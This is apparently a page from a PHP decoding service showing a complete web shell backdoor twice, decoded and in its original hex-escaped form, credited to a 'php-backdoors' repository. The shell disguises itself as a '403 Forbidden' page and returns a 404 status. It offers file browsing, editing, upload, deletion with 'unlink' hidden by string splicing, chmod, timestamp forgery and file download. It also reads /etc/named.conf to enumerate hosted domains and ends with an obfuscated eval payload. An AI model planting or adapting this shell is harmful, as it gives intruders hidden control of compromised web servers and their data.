Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // from https://github.com/1337r0j4n/php-backdoors goto jftpU; XlRbQ: foreach (arr..

Decoded Output download

<?php // from https://github.com/1337r0j4n/php-backdoors 
 goto jftpU; XlRbQ: foreach (array_merge($dirs, $files) as $path) { $d = is_dir($path); $w = is_writable($path); ?> 
<tr> 
    <td class="<?php  echo ($d ? "directory" : "file") . " " . ($w ? "writable" : "notwritable"); ?> 
"><a href="?<?php  echo $d ? "dir=" . e($path) . '' : "file=" . e($path) . "&" . $edir; ?> 
"><?php  echo htmlspecialchars(basename($path)); ?> 
        </a><?php  echo is_link($path) ? "<span class="symlink">" . readlink($path) . "</span>" : ''; ?> 
    </td> 
    <td><?php  echo $d ? "---" : size($path); ?> 
    </td> 
    <td><a href="?chtime=<?php  echo e($path) . "&" . $edir; ?> 
" class="btn" onclick='return chtime(this,"<?php  $chtime = date("M-d-Y H:i:s", filemtime($path)); echo $chtime; ?> 
")'><?php  echo $chtime; ?> 
        </a></td> 
    <td><a href="?chmod=<?php  echo e($path) . "&" . $edir; ?> 
" class="btn" onclick='return chmod(this,"<?php  echo substr(sprintf("%o", @fileperms($path)), -4); ?> 
")'><?php  echo perms($path); ?> 
        </a></td> 
    <td><?php  if (basename($path) !== "..") { ?> 
        <a href="?delete=<?php  echo e($path) . "&" . $edir; ?> 
" class="btn icon delete" onclick='return confirm("Sure to delete?")' title="Delete"></a><a href="?rename=<?php  echo e($path) . "&" . $edir; ?> 
" class="btn icon rename" onclick='return rename(this,"<?php  echo basename($path); ?> 
")' title="Rename"></a><?php  if (!$d) { echo "<a title="Download" class="btn icon download" href="?dl=" . e($path) . ""></a>"; } } ?> 
    </td> 
</tr> 
<?php  } goto sxAjy; hPs32: echo $dir; goto m1QUh; wPxEo: echo $_SERVER["REMOTE_ADDR"]; goto JDqVU; x1s75: $dir = $dir ? $dir : __DIR__; goto Ws2q7; sCoxG: if (isset($_GET["chtime"], $_GET["new"])) { if (touch($_GET["chtime"], intval(strtotime($_GET["new"])))) { echo "<span class="success">TIME MACHINE SUCCESS!</span>"; } else { echo "<span class="failed">TIME MACHINE FAILED!</span>"; } } goto Dbb9T; EJMxG: function perms($path) { clearstatcache(); $perms = fileperms($path); $x = array("U", "p", "c", "U", "d", "U", "b", "U", "r", "U", "l", "U", "s", "U", "U", "U"); $info = $x[$perms >> 12] . implode('', array_map(function ($b, $m) { return $b == "1" ? $m : "-"; }, str_split(decbin($perms & 4095) . ''), str_split("rwxrwxrwx"))); return $info . " " . substr(sprintf("%o", @fileperms($path)), -4); } goto cLtwK; m1QUh: ?> 
"><button>GO</button><a href="?dir=<?php  goto LZJ23; LpZSp: $dirs = array(); goto gZWA2; P16Sh: function symlinkDomain($dom) { $d0mains = @file("/etc/named.conf", false); if (!$d0mains) { $dom = "<font color=red size=3px>Cant Read [ /etc/named.conf ]</font>"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count} Domain"; } return $dom; } goto eCm9p; rBvqN: echo is_writable($dir) ? "writable" : "notwritable"; goto OuL0o; cLtwK: if (!function_exists("posix_getpwuid") && !extension_loaded("posix")) { function posix_getpwuid($x) { return array("name" => "---"); } } goto K42CU; LR6tS: if (isset($_GET["file"])) { if (isset($_POST["edit"])) { if (@file_put_contents($_GET["file"], $_POST["edit"])) { echo "<span class="success">EDIT SUCCESS!</span>"; } else { echo "<span class="failed">EDIT FAILED!</span>"; } } echo "<form action="?file=" . e($_GET["file"]) . "&" . $edir . "" method="post" onsubmit="edit.value=e(edit.value)"><textarea id="edit" name="edit">" . htmlspecialchars(file_get_contents($_GET["file"]), ENT_QUOTES | ENT_SUBSTITUTE | ENT_COMPAT, "UTF-8") . "</textarea><button>Update</button></form>"; } goto UtMjm; fEYxs: ?> 
">[Shell Path]</a></form> 
<table> 
    <tr> 
        <th></th> 
        <th>SIZE</th> 
        <th>Modified Date</th> 
        <th>PERMS</th> 
        <th>ACTION</th> 
    </tr> 
    <?php  goto XlRbQ; B1jhW: function e($s) { return base64_encode($s); } goto c7Q09; Ws2q7: chdir($dir); goto Ieky2; xD2Xi: ?> 
    <br><a href="?info=info" class="btn" target="__blank">SERVER 
        INFO</a>:<?php  goto XC1Yu; eMOpg: foreach (scandir($dir) as $p) { if (is_dir($dir . "/" . $p)) { if ($p != ".") { $dirs[] = $dir . "/" . $p; } } else { $files[] = $dir . "/" . $p; } } goto moCtt; FaueU: if (isset($_GET["chmod"], $_GET["new"])) { if (chmod($_GET["chmod"], intval($_GET["new"], 8))) { echo "<span class="success">CHMOD SUCCESS!</span>"; } else { echo "<span class="failed">CHMOD FAILED!</span>"; } } goto sCoxG; Yw6Fi: foreach ($_POST as $k => $v) { $_POST[$k] = d($v); } goto LJQkQ; m2IZa: echo $edir; goto UJMti; UJMti: ?> 
    "enctype="multipart/form-data"method="post"><input class="<?php  goto rBvqN; GKrTq: foreach ($_GET as $k => $v) { $_GET[$k] = d($v); } goto Yw6Fi; OuL0o: ?> 
" name="file" type="file"><button type="submit">Upload</button></form> 
    <center><?php  goto QeiKN; iCNet: echo e(realpath(__DIR__)); goto fEYxs; JDqVU: ?> 
        <br>SERVER 
        IP:<?php  goto veYrr; c7Q09: function d($s) { return base64_decode($s); } goto zTEkQ; XC1Yu: echo php_uname(); goto FIKKi; Ieky2: $edir = "dir=" . e($dir); goto hKpRM; gZWA2: $files = array(); goto eMOpg; K42CU: ?> 
        <!doctypehtml> 
            <html> 
 
            <head> 
                <meta content="width=device-width,initial-scale=0.5,user-scalable=yes" name="viewport"> 
                <title>403 Forbidden</title> 
                <style> 
                    body, 
                    button, 
                    html, 
                    input { 
                        background: #000; 
                        color: gray; 
                        font-family: monospace 
                    } 
 
                    a { 
                        color: gray; 
                        text-decoration: none 
                    } 
 
                    button, 
                    input { 
                        border: 1px solid gray; 
                        height: 1.7em 
                    } 
 
                    table { 
                        width: 100%; 
                        border: 1px dotted gray; 
                        border-spacing: 0 
                    } 
 
                    tr:hover { 
                        background: #161616 
                    } 
 
                    td, 
                    th { 
                        padding: 2px 0; 
                        border: 1px solid #666 
                    } 
 
                    textarea { 
                        width: 80%; 
                        height: 50vh; 
                        background: #000; 
                        color: green; 
                        tab-size: 4 
                    } 
 
                    .btn { 
                        border: 1px solid #666; 
                        border-radius: .3em; 
                        padding: 0 .3em; 
                        display: inline-block; 
                        text-align: center 
                    } 
 
                    .btn:hover { 
                        border-color: #fff; 
                        background-color: #000; 
                        transition: background-color .2s linear 
                    } 
 
                    .directory { 
                        background: #444654 
                    } 
 
                    .directory:before { 
                        content: "DIR/"; 
                        color: gray 
                    } 
 
                    .file { 
                        background: #343641 
                    } 
 
                    .file:before { 
                        content: "-"; 
                        color: gray 
                    } 
 
                    .notwritable, 
                    .notwritable a { 
                        color: #ff7800 
                    } 
 
                    .writable, 
                    .writable a { 
                        color: #49ff00 
                    } 
 
                    .symlink { 
                        float: right; 
                        color: #e2c275 
                    } 
 
                    .icon { 
                        font-size: 1.5em; 
                        padding: .1em .2em; 
                        margin: 0 
                    } 
 
                    .delete:before { 
                        content: "F6AE"; 
                        opacity: .7 
                    } 
 
                    .rename:before { 
                        content: "D"; 
                        color: #00f 
                    } 
 
                    .download:before { 
                        content: "9393"; 
                        color: green 
                    } 
 
                    .openlink:before { 
                        content: "F517" 
                    } 
 
                    .success { 
                        color: #ff0 
                    } 
 
                    .success:before { 
                        content: "C" 
                    } 
 
                    .failed { 
                        color: red 
                    } 
 
                    .failed:before { 
                        content: "2" 
                    } 
                </style> 
                <script> 
                    function e(e) { 
                        return btoa(e) 
                    } 
 
                    function chmod(n, r) { 
                        var t = prompt("CHMOD:", r); 
                        return !!t && (n.href += "&new=" + e(t), !0) 
                    } 
 
                    function chtime(n, r) { 
                        var t = prompt("Change modified time:", r); 
                        return !!t && (n.href += "&new=" + e(t), !0) 
                    } 
 
                    function rename(n, r) { 
                        var t = prompt("Rename:", r); 
                        return !!t && (n.href += "&new=" + e(t), !0) 
                    } 
                </script> 
            </head> 
 
            <body>YOUR 
                IP:<?php  goto wPxEo; hKpRM: if (isset($_GET["dl"])) { if (!realpath($_GET["dl"])) { die; } header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($_POST["dl"]) . """); readfile($_GET["dl"]); die; } goto kewHO; veYrr: echo gethostbyname($_SERVER["HTTP_HOST"]) . " / " . $_SERVER["SERVER_NAME"]; goto q3FKZ; FIKKi: ?> 
                <br> 
                <form action="?<?php  goto m2IZa; zTEkQ: if (isset($_GET["info"]) && $_GET["info"] === "info") { phpinfo(); die; } goto GKrTq; LZJ23: echo e(realpath($_SERVER["DOCUMENT_ROOT"])); goto KXE3_; UtMjm: if (isset($_GET["delete"])) { $x = str_replace("X", '', "XuXnXlXiXnXkX"); if ($x($_GET["delete"])) { echo "<span class="success">DELETE SUCCESS!</span>"; } else { echo "<span class="failed">DELETE FAILED!</span>"; } } goto FaueU; KXE3_: ?> 
">[Root Path]</a><a href="?dir=<?php  goto iCNet; eCm9p: ?> 
DOMAIN ON SERVER :<?php  goto Ub2Ba; kewHO: function size($path, $decimals = 0) { $bytes = filesize($path); $factor = floor((strlen($bytes) - 1) / 3); if ($factor > 0) { $sz = "KMGT"; } return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . @$sz[$factor - 1] . "B"; } goto EJMxG; Ub2Ba: echo symlinkDomain($dom); goto xD2Xi; Dbb9T: if (isset($_GET["rename"], $_GET["new"])) { if (rename($_GET["rename"], $dir . "/" . basename($_GET["new"]))) { echo "<span class="success">RENAME SUCCESS!</span>"; } else { echo "<span class="failed">RENAME FAILED!</span>"; } } goto LpZSp; iM4rT: ini_set("display_startup_errors", 1); goto jicsp; tzs1d: ?> 
" name="dir" id="dir" style="width:500px" value="<?php  goto hPs32; QeiKN: if (isset($_FILES["file"])) { if (move_uploaded_file($_FILES["file"]["tmp_name"], basename($_FILES["file"]["name"]))) { echo "<span class="success">UPLOAD SUCCESS!</span>"; } else { echo "<span class="failed">UPLOAD FAILED!</span>"; } } goto LR6tS; moCtt: ?> 
</center><form onsubmit=" dir.value=e(dir.value)">Directory: <input class="<?php  goto UGzkw; jftpU: ini_set("display_errors", 1); goto iM4rT; q3FKZ: ?> 
<br><?php  goto P16Sh; jicsp: error_reporting(0); goto jnJQU; jnJQU: http_response_code(404); goto B1jhW; LJQkQ: $dir = realpath(isset($_GET["dir"]) ? $_GET["dir"] : __DIR__); goto x1s75; UGzkw: echo is_writable($dir) ? "writable" : "notwritable"; goto tzs1d; sxAjy: eval(str_rot13(gzinflate(str_rot13(base64_decode('cpBEeIMwEIDf/RVOhCh1XO3TLB2sndq9jOHDHiYSWaYRW6yeWiD++rWm0MHyktx93GqXZksrayvQFjk0zZP3PCmwuenrx2qOWFGQHdvkP97vknnBD5LkYoc8zegh+cLlxpqUBm0BTgdJCahR428pBI/DY/UckTWJojVMPYWXV8lTVh51DbI5UFS45NhURq8b8EQjd+h04zheXddVgFtL6G0WH1PbF3Fvk4N+hBqjW9r+NK0DZOIQo55mrYZeKEmFx6DrumBv9Ry0tYZ3YCOMtv/wzCAkG40H72p2hv/A+5eW3rch6LlIbaQ/LdQnt8BzqwtozLv0WWjpW6Xnen4B')))));?> 
</table>Modified By #No_Identity :: <a href=" https://github.com/yon3zu">github.com/yon3zu </a> - <a 
                            href="https://linuxploit.com/">linuxploit.com</a> 
            </body> 
 
            </html>

Did this file decode correctly?

Original Code

<?php // from https://github.com/1337r0j4n/php-backdoors
 goto jftpU; XlRbQ: foreach (array_merge($dirs, $files) as $path) { $d = is_dir($path); $w = is_writable($path); ?>
<tr>
    <td class="<?php  echo ($d ? "\144\151\x72\145\x63\x74\x6f\x72\x79" : "\146\151\x6c\145") . "\40" . ($w ? "\167\x72\151\x74\141\x62\154\145" : "\x6e\x6f\164\167\x72\x69\164\x61\x62\x6c\x65"); ?>
"><a href="?<?php  echo $d ? "\x64\x69\162\x3d" . e($path) . '' : "\x66\151\154\145\75" . e($path) . "\x26" . $edir; ?>
"><?php  echo htmlspecialchars(basename($path)); ?>
        </a><?php  echo is_link($path) ? "\x3c\x73\160\x61\156\x20\143\x6c\141\x73\163\75\42\163\171\x6d\154\151\156\153\42\x3e" . readlink($path) . "\x3c\57\163\160\141\x6e\x3e" : ''; ?>
    </td>
    <td><?php  echo $d ? "\55\x2d\55" : size($path); ?>
    </td>
    <td><a href="?chtime=<?php  echo e($path) . "\46" . $edir; ?>
" class="btn" onclick='return chtime(this,"<?php  $chtime = date("\115\x2d\x64\55\131\x20\110\x3a\x69\72\x73", filemtime($path)); echo $chtime; ?>
")'><?php  echo $chtime; ?>
        </a></td>
    <td><a href="?chmod=<?php  echo e($path) . "\46" . $edir; ?>
" class="btn" onclick='return chmod(this,"<?php  echo substr(sprintf("\45\x6f", @fileperms($path)), -4); ?>
")'><?php  echo perms($path); ?>
        </a></td>
    <td><?php  if (basename($path) !== "\x2e\x2e") { ?>
        <a href="?delete=<?php  echo e($path) . "\46" . $edir; ?>
" class="btn icon delete" onclick='return confirm("Sure to delete?")' title="Delete"></a><a href="?rename=<?php  echo e($path) . "\x26" . $edir; ?>
" class="btn icon rename" onclick='return rename(this,"<?php  echo basename($path); ?>
")' title="Rename"></a><?php  if (!$d) { echo "\74\141\40\x74\x69\164\x6c\145\x3d\42\x44\157\x77\x6e\x6c\157\141\144\42\x20\x63\x6c\x61\163\x73\75\42\142\x74\x6e\40\x69\143\x6f\x6e\x20\144\157\167\156\154\x6f\x61\x64\42\40\150\x72\145\x66\x3d\42\x3f\x64\154\x3d" . e($path) . "\42\x3e\x3c\x2f\141\76"; } } ?>
    </td>
</tr>
<?php  } goto sxAjy; hPs32: echo $dir; goto m1QUh; wPxEo: echo $_SERVER["\122\105\x4d\x4f\x54\x45\x5f\x41\104\104\x52"]; goto JDqVU; x1s75: $dir = $dir ? $dir : __DIR__; goto Ws2q7; sCoxG: if (isset($_GET["\143\x68\x74\151\155\145"], $_GET["\156\145\167"])) { if (touch($_GET["\143\x68\164\151\155\145"], intval(strtotime($_GET["\156\145\x77"])))) { echo "\74\163\x70\141\x6e\40\x63\x6c\x61\x73\x73\75\42\x73\165\143\x63\x65\x73\x73\x22\x3e\124\x49\115\x45\x20\x4d\101\103\x48\x49\x4e\105\x20\123\x55\103\103\105\123\x53\x21\74\57\x73\160\141\x6e\76"; } else { echo "\x3c\163\160\x61\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\146\141\151\154\x65\x64\x22\x3e\124\x49\115\x45\40\115\x41\x43\x48\111\x4e\x45\40\x46\x41\x49\114\x45\x44\x21\x3c\x2f\163\x70\141\x6e\x3e"; } } goto Dbb9T; EJMxG: function perms($path) { clearstatcache(); $perms = fileperms($path); $x = array("\125", "\160", "\x63", "\x55", "\144", "\125", "\142", "\125", "\x72", "\125", "\x6c", "\125", "\163", "\125", "\125", "\125"); $info = $x[$perms >> 12] . implode('', array_map(function ($b, $m) { return $b == "\61" ? $m : "\55"; }, str_split(decbin($perms & 4095) . ''), str_split("\162\167\x78\x72\x77\x78\162\167\170"))); return $info . "\x20" . substr(sprintf("\x25\x6f", @fileperms($path)), -4); } goto cLtwK; m1QUh: ?>
"><button>GO</button><a href="?dir=<?php  goto LZJ23; LpZSp: $dirs = array(); goto gZWA2; P16Sh: function symlinkDomain($dom) { $d0mains = @file("\57\x65\x74\143\x2f\x6e\141\155\x65\144\x2e\x63\x6f\156\x66", false); if (!$d0mains) { $dom = "\x3c\x66\157\x6e\164\40\143\157\154\157\162\75\162\145\144\x20\163\151\x7a\145\x3d\x33\160\x78\76\x43\141\x6e\164\x20\x52\x65\x61\144\x20\x5b\40\x2f\x65\x74\x63\57\156\x61\155\145\x64\x2e\x63\x6f\156\146\40\135\x3c\57\x66\157\156\164\76"; $GLOBALS["\x6e\x65\145\x64\x5f\164\157\x5f\165\160\x64\141\x74\x65\x5f\150\145\x61\x64\145\162"] = "\x74\162\x75\145"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "\x7a\157\x6e\x65")) { preg_match_all("\43\x7a\157\x6e\145\40\x22\x28\56\52\x29\42\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count}\x20\x44\157\x6d\x61\151\x6e"; } return $dom; } goto eCm9p; rBvqN: echo is_writable($dir) ? "\x77\x72\151\x74\141\x62\154\x65" : "\x6e\x6f\x74\167\162\x69\x74\x61\142\x6c\145"; goto OuL0o; cLtwK: if (!function_exists("\160\x6f\x73\x69\170\x5f\147\145\164\x70\x77\165\151\144") && !extension_loaded("\x70\x6f\x73\x69\170")) { function posix_getpwuid($x) { return array("\x6e\x61\155\145" => "\55\55\55"); } } goto K42CU; LR6tS: if (isset($_GET["\x66\151\x6c\145"])) { if (isset($_POST["\145\x64\x69\164"])) { if (@file_put_contents($_GET["\146\151\x6c\145"], $_POST["\145\x64\151\164"])) { echo "\74\163\x70\x61\x6e\40\x63\154\141\x73\163\x3d\x22\163\x75\143\x63\x65\163\163\42\76\105\x44\111\124\40\x53\x55\x43\x43\x45\x53\123\41\74\57\163\160\141\156\76"; } else { echo "\74\x73\160\x61\156\40\x63\x6c\141\x73\163\x3d\x22\x66\x61\x69\154\145\144\x22\76\x45\104\111\x54\x20\106\x41\x49\114\105\x44\x21\x3c\x2f\163\x70\141\156\x3e"; } } echo "\74\146\x6f\x72\x6d\x20\141\143\x74\x69\x6f\x6e\x3d\x22\77\146\x69\154\x65\75" . e($_GET["\146\x69\x6c\x65"]) . "\x26" . $edir . "\42\x20\155\x65\164\150\x6f\144\x3d\x22\160\157\x73\164\x22\40\x6f\x6e\163\165\x62\155\x69\x74\x3d\42\x65\144\x69\164\x2e\x76\x61\154\165\145\x3d\145\x28\x65\x64\151\x74\x2e\166\141\x6c\x75\x65\x29\42\x3e\x3c\x74\145\x78\164\x61\x72\x65\141\40\151\144\75\x22\145\144\151\x74\x22\x20\x6e\141\155\x65\x3d\x22\145\x64\151\164\42\76" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\x65"]), ENT_QUOTES | ENT_SUBSTITUTE | ENT_COMPAT, "\x55\x54\106\55\x38") . "\74\57\164\x65\170\x74\141\162\x65\141\76\x3c\142\165\x74\x74\x6f\x6e\76\125\x70\x64\x61\x74\145\x3c\57\142\x75\164\x74\157\156\x3e\x3c\x2f\146\x6f\162\155\x3e"; } goto UtMjm; fEYxs: ?>
">[Shell Path]</a></form>
<table>
    <tr>
        <th></th>
        <th>SIZE</th>
        <th>Modified Date</th>
        <th>PERMS</th>
        <th>ACTION</th>
    </tr>
    <?php  goto XlRbQ; B1jhW: function e($s) { return base64_encode($s); } goto c7Q09; Ws2q7: chdir($dir); goto Ieky2; xD2Xi: ?>
    <br><a href="?info=info" class="btn" target="__blank">SERVER
        INFO</a>:<?php  goto XC1Yu; eMOpg: foreach (scandir($dir) as $p) { if (is_dir($dir . "\57" . $p)) { if ($p != "\x2e") { $dirs[] = $dir . "\57" . $p; } } else { $files[] = $dir . "\x2f" . $p; } } goto moCtt; FaueU: if (isset($_GET["\x63\150\155\157\144"], $_GET["\156\145\167"])) { if (chmod($_GET["\x63\x68\x6d\x6f\144"], intval($_GET["\156\x65\x77"], 8))) { echo "\x3c\163\160\x61\x6e\x20\x63\154\141\163\x73\75\42\x73\x75\143\x63\145\163\x73\x22\x3e\x43\x48\x4d\x4f\x44\40\123\125\x43\x43\x45\x53\123\x21\x3c\x2f\x73\x70\x61\156\x3e"; } else { echo "\x3c\x73\x70\x61\156\x20\x63\154\x61\163\x73\x3d\42\146\x61\x69\x6c\145\x64\x22\x3e\103\110\115\117\x44\x20\106\x41\x49\114\x45\104\41\x3c\57\x73\160\141\x6e\76"; } } goto sCoxG; Yw6Fi: foreach ($_POST as $k => $v) { $_POST[$k] = d($v); } goto LJQkQ; m2IZa: echo $edir; goto UJMti; UJMti: ?>
    "enctype="multipart/form-data"method="post"><input class="<?php  goto rBvqN; GKrTq: foreach ($_GET as $k => $v) { $_GET[$k] = d($v); } goto Yw6Fi; OuL0o: ?>
" name="file" type="file"><button type="submit">Upload</button></form>
    <center><?php  goto QeiKN; iCNet: echo e(realpath(__DIR__)); goto fEYxs; JDqVU: ?>
        <br>SERVER
        IP:<?php  goto veYrr; c7Q09: function d($s) { return base64_decode($s); } goto zTEkQ; XC1Yu: echo php_uname(); goto FIKKi; Ieky2: $edir = "\x64\x69\x72\x3d" . e($dir); goto hKpRM; gZWA2: $files = array(); goto eMOpg; K42CU: ?>
        <!doctypehtml>
            <html>

            <head>
                <meta content="width=device-width,initial-scale=0.5,user-scalable=yes" name="viewport">
                <title>403 Forbidden</title>
                <style>
                    body,
                    button,
                    html,
                    input {
                        background: #000;
                        color: gray;
                        font-family: monospace
                    }

                    a {
                        color: gray;
                        text-decoration: none
                    }

                    button,
                    input {
                        border: 1px solid gray;
                        height: 1.7em
                    }

                    table {
                        width: 100%;
                        border: 1px dotted gray;
                        border-spacing: 0
                    }

                    tr:hover {
                        background: #161616
                    }

                    td,
                    th {
                        padding: 2px 0;
                        border: 1px solid #666
                    }

                    textarea {
                        width: 80%;
                        height: 50vh;
                        background: #000;
                        color: green;
                        tab-size: 4
                    }

                    .btn {
                        border: 1px solid #666;
                        border-radius: .3em;
                        padding: 0 .3em;
                        display: inline-block;
                        text-align: center
                    }

                    .btn:hover {
                        border-color: #fff;
                        background-color: #000;
                        transition: background-color .2s linear
                    }

                    .directory {
                        background: #444654
                    }

                    .directory:before {
                        content: "DIR/";
                        color: gray
                    }

                    .file {
                        background: #343641
                    }

                    .file:before {
                        content: "-";
                        color: gray
                    }

                    .notwritable,
                    .notwritable a {
                        color: #ff7800
                    }

                    .writable,
                    .writable a {
                        color: #49ff00
                    }

                    .symlink {
                        float: right;
                        color: #e2c275
                    }

                    .icon {
                        font-size: 1.5em;
                        padding: .1em .2em;
                        margin: 0
                    }

                    .delete:before {
                        content: "\1F6AE";
                        opacity: .7
                    }

                    .rename:before {
                        content: "\270D";
                        color: #00f
                    }

                    .download:before {
                        content: "\2193\2193";
                        color: green
                    }

                    .openlink:before {
                        content: "\1F517"
                    }

                    .success {
                        color: #ff0
                    }

                    .success:before {
                        content: "\270C"
                    }

                    .failed {
                        color: red
                    }

                    .failed:before {
                        content: "\2622"
                    }
                </style>
                <script>
                    function e(e) {
                        return btoa(e)
                    }

                    function chmod(n, r) {
                        var t = prompt("CHMOD:", r);
                        return !!t && (n.href += "&new=" + e(t), !0)
                    }

                    function chtime(n, r) {
                        var t = prompt("Change modified time:", r);
                        return !!t && (n.href += "&new=" + e(t), !0)
                    }

                    function rename(n, r) {
                        var t = prompt("Rename:", r);
                        return !!t && (n.href += "&new=" + e(t), !0)
                    }
                </script>
            </head>

            <body>YOUR
                IP:<?php  goto wPxEo; hKpRM: if (isset($_GET["\144\154"])) { if (!realpath($_GET["\x64\154"])) { die; } header("\x43\157\x6e\x74\145\x6e\x74\x2d\104\145\x73\x63\162\151\160\164\151\157\156\72\x20\106\x69\154\x65\40\124\x72\x61\x6e\x73\x66\x65\x72"); header("\103\157\156\164\x65\x6e\164\55\x54\x79\x70\145\x3a\x20\x61\x70\160\154\151\143\141\164\151\157\156\57\157\x63\x74\145\x74\55\x73\164\x72\145\141\155"); header("\103\157\156\x74\x65\x6e\164\x2d\x44\x69\163\160\157\163\x69\164\151\157\156\72\40\x61\164\164\141\x63\150\x6d\x65\x6e\x74\x3b\x20\146\151\154\x65\156\x61\155\145\75\x22" . basename($_POST["\144\x6c"]) . "\42"); readfile($_GET["\x64\154"]); die; } goto kewHO; veYrr: echo gethostbyname($_SERVER["\x48\124\x54\120\137\x48\x4f\123\124"]) . "\x20\57\40" . $_SERVER["\123\105\x52\x56\105\122\137\116\101\115\x45"]; goto q3FKZ; FIKKi: ?>
                <br>
                <form action="?<?php  goto m2IZa; zTEkQ: if (isset($_GET["\x69\x6e\146\157"]) && $_GET["\x69\156\146\157"] === "\x69\x6e\x66\157") { phpinfo(); die; } goto GKrTq; LZJ23: echo e(realpath($_SERVER["\x44\x4f\103\x55\115\x45\116\124\x5f\x52\117\x4f\124"])); goto KXE3_; UtMjm: if (isset($_GET["\x64\x65\x6c\145\164\145"])) { $x = str_replace("\130", '', "\x58\165\130\x6e\x58\x6c\x58\x69\130\156\130\153\130"); if ($x($_GET["\x64\x65\x6c\145\164\x65"])) { echo "\74\163\x70\x61\156\40\x63\154\x61\163\163\x3d\x22\x73\x75\143\143\145\163\163\42\76\104\105\114\105\x54\105\x20\x53\125\x43\103\x45\x53\123\41\x3c\57\x73\160\141\156\x3e"; } else { echo "\74\163\160\141\x6e\40\143\x6c\141\163\163\75\x22\146\x61\x69\x6c\x65\x64\x22\x3e\x44\x45\x4c\x45\x54\105\40\106\101\111\114\x45\x44\41\74\x2f\x73\160\141\156\x3e"; } } goto FaueU; KXE3_: ?>
">[Root Path]</a><a href="?dir=<?php  goto iCNet; eCm9p: ?>
DOMAIN ON SERVER :<?php  goto Ub2Ba; kewHO: function size($path, $decimals = 0) { $bytes = filesize($path); $factor = floor((strlen($bytes) - 1) / 3); if ($factor > 0) { $sz = "\113\115\x47\x54"; } return sprintf("\x25\56{$decimals}\146", $bytes / pow(1024, $factor)) . @$sz[$factor - 1] . "\102"; } goto EJMxG; Ub2Ba: echo symlinkDomain($dom); goto xD2Xi; Dbb9T: if (isset($_GET["\x72\145\x6e\x61\x6d\145"], $_GET["\156\x65\167"])) { if (rename($_GET["\162\x65\156\141\155\145"], $dir . "\57" . basename($_GET["\x6e\145\x77"]))) { echo "\x3c\163\160\141\156\x20\143\154\x61\x73\163\75\x22\x73\x75\143\143\145\163\163\x22\x3e\122\x45\x4e\x41\115\105\x20\123\x55\x43\x43\x45\x53\x53\41\x3c\x2f\163\160\x61\x6e\76"; } else { echo "\x3c\x73\x70\x61\156\x20\x63\154\141\163\x73\x3d\x22\146\141\x69\x6c\x65\144\42\76\x52\105\116\x41\x4d\105\40\x46\101\x49\114\105\104\41\x3c\x2f\163\x70\x61\156\76"; } } goto LpZSp; iM4rT: ini_set("\144\151\163\x70\154\141\171\x5f\163\164\x61\162\x74\x75\x70\x5f\145\x72\162\157\x72\x73", 1); goto jicsp; tzs1d: ?>
" name="dir" id="dir" style="width:500px" value="<?php  goto hPs32; QeiKN: if (isset($_FILES["\x66\151\x6c\145"])) { if (move_uploaded_file($_FILES["\146\151\x6c\x65"]["\x74\155\x70\137\156\x61\x6d\145"], basename($_FILES["\146\x69\x6c\x65"]["\x6e\x61\x6d\145"]))) { echo "\74\163\x70\x61\x6e\40\143\154\x61\163\163\75\x22\163\165\143\x63\145\163\x73\42\76\x55\x50\x4c\117\101\104\x20\123\125\103\x43\105\123\x53\x21\x3c\57\163\160\x61\x6e\x3e"; } else { echo "\74\x73\x70\141\156\40\x63\154\141\163\163\75\x22\146\x61\151\154\x65\144\42\76\125\120\x4c\x4f\x41\104\40\x46\x41\x49\x4c\105\x44\41\74\57\163\160\x61\x6e\76"; } } goto LR6tS; moCtt: ?>
</center><form onsubmit=" dir.value=e(dir.value)">Directory: <input class="<?php  goto UGzkw; jftpU: ini_set("\x64\x69\163\x70\x6c\x61\x79\x5f\145\x72\x72\157\162\x73", 1); goto iM4rT; q3FKZ: ?>
<br><?php  goto P16Sh; jicsp: error_reporting(0); goto jnJQU; jnJQU: http_response_code(404); goto B1jhW; LJQkQ: $dir = realpath(isset($_GET["\x64\151\x72"]) ? $_GET["\x64\x69\x72"] : __DIR__); goto x1s75; UGzkw: echo is_writable($dir) ? "\x77\162\151\x74\x61\x62\154\x65" : "\156\x6f\164\x77\x72\151\164\141\142\x6c\x65"; goto tzs1d; sxAjy: eval(str_rot13(gzinflate(str_rot13(base64_decode('cpBEeIMwEIDf/RVOhCh1XO3TLB2sndq9jOHDHiYSWaYRW6yeWiD++rWm0MHyktx93GqXZksrayvQFjk0zZP3PCmwuenrx2qOWFGQHdvkP97vknnBD5LkYoc8zegh+cLlxpqUBm0BTgdJCahR428pBI/DY/UckTWJojVMPYWXV8lTVh51DbI5UFS45NhURq8b8EQjd+h04zheXddVgFtL6G0WH1PbF3Fvk4N+hBqjW9r+NK0DZOIQo55mrYZeKEmFx6DrumBv9Ry0tYZ3YCOMtv/wzCAkG40H72p2hv/A+5eW3rch6LlIbaQ/LdQnt8BzqwtozLv0WWjpW6Xnen4B')))));?>
</table>Modified By #No_Identity :: <a href=" https://github.com/yon3zu">github.com/yon3zu </a> - <a
                            href="https://linuxploit.com/">linuxploit.com</a>
            </body>

            </html>

Function Calls

None

Variables

None

Stats

MD5 b30a93b8c2523ad0cf18ca9536c67d42
Eval Count 0
Decode Time 118 ms